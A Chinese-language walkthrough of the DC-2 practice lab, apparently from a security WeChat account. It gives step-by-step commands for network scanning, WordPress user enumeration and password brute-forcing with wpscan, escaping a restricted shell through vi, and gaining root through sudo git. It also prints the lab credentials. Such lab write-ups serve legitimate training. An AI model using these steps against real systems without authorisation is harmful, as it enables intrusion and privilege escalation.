虚拟环境:vmware
网络:NAT部署
攻击端:kali
靶机:DC-2
nmap -sP 192.168.117.0/24
扫到目标IP:
192.168.117.152
nmap -sS 192.168.117.152 -p 1-65535
扫到目标端口:
80 http
7744
服务识别:
telnet 192.168.117.152 7744
判断服务:
7744 ssh
http://192.168.117.152
被重定向到:
http://dc-2
修改hosts文件:
vim /etc/hosts
添加下面内容
注意中间不是空格是Tab
192.168.117.152 dc-2
http://dc-2
找到flag1:
提示使用 cewl 命令
2.构建密码字典
cewl http://dc-2 > passwd.txt
或
cewl http://dc-2 -o passwd.txt
注意,这里要用http://dc-2 ,不能使用http://192.168.117.152
获取到:
字典passwd.txt
dirsearch -u http://dc-2
扫到登录页面:
http://dc-2/wp-login.php
发现是wps框架
此时我们有了:
登录页
密码本
wps框架
此时需要找一个账号集,才能进行登录爆破。
wpscan --url http://dc-2 -e u
找到账号:
admin
jerry
tom
echo "name" > user.txt
echo "jerry" >> user.txt
echo "tom" >> user.txt
得到账号本:
user.txt
wpscan --url http://dc-2/ -U user.txt -P passwd.txt
得到两个账号密码:
jerry/adipiscing
tom/parturient
登录http网站,获取flag2。
这里什么也没有,换个地方看看
ssh tom@dc-2 -p 7744
成功登录tom账号。
ls
cat flag3.txt
compgen -c
查看文件发现flag3.txt,但cat没命令,查看可执行命令:
vi
less
vi flag3.txt
得到提示:
下一步获取jerry权限
使用vi编辑器打开任意文件,使用vi编辑器命令:
:set shell=/bin/sh
:shell
得到普通sh的shell:
cd ../jerry
ls
vi flag4.txt
得到提示:
已经没有提示了,需要靠自己得到final flag
发现/bin/su可以执行,使用:
/bin/su jerry
adipiscing
得到:
jerry shell
sudo -l
得到:
/usr/bin/git
发现sudo可以免密提升root权限的git命令:
sudo git help config
!/bin/bash
whoami
得到:
root shell
cd ~
ls
cat final-flag.txt
免责声明:
对于因使用、参考、传播本公众号安诺信安所提供的信息而导致的任何直接或间接损失、损害及后果,均由使用者本人承担和负责,公众号安诺信安及作者不为此承担任何责任。本信息的发布不代表任何形式的支持或认可,也不构成任何形式的建议或建议的依据。本信息的使用者应自行承担风险,并自行负责核实信息的准确性、完整性和适用性。本信息可能包含第三方的资料、链接或内容。这些第三方资料、链接或内容不受本公众号安诺信安及作者的控制,本公众号安诺信安及作者对其准确性、完整性、及时性、合法性、安全性等不作任何保证或承诺,也不对其内容的真实性、合法性、适用性、完整性、准确性、安全性等作出任何声明或保证。使用或参考这些第三方资料、链接或内容所造成的任何损失或损害,本公众号安诺信安及作者不承担任何形式的责任。本信息的内容可能会根据实际情况进行更改、更新、删除或修正,本公众号安诺信安及作者有权自行决定对本信息进行任何形式的修改、更改或删除,不另行通知。任何人士或单位如需要使用或参考本信息,应该事先确认本信息的适用性,并采取必要的预防措施,以避免因使用或参考本信息而导致的任何损失或损害。最后,本公众号安诺信安及作者保留对本信息及其免责声明的最终解释权,如有侵权烦请告知,我们会立即删除并致歉,谢谢!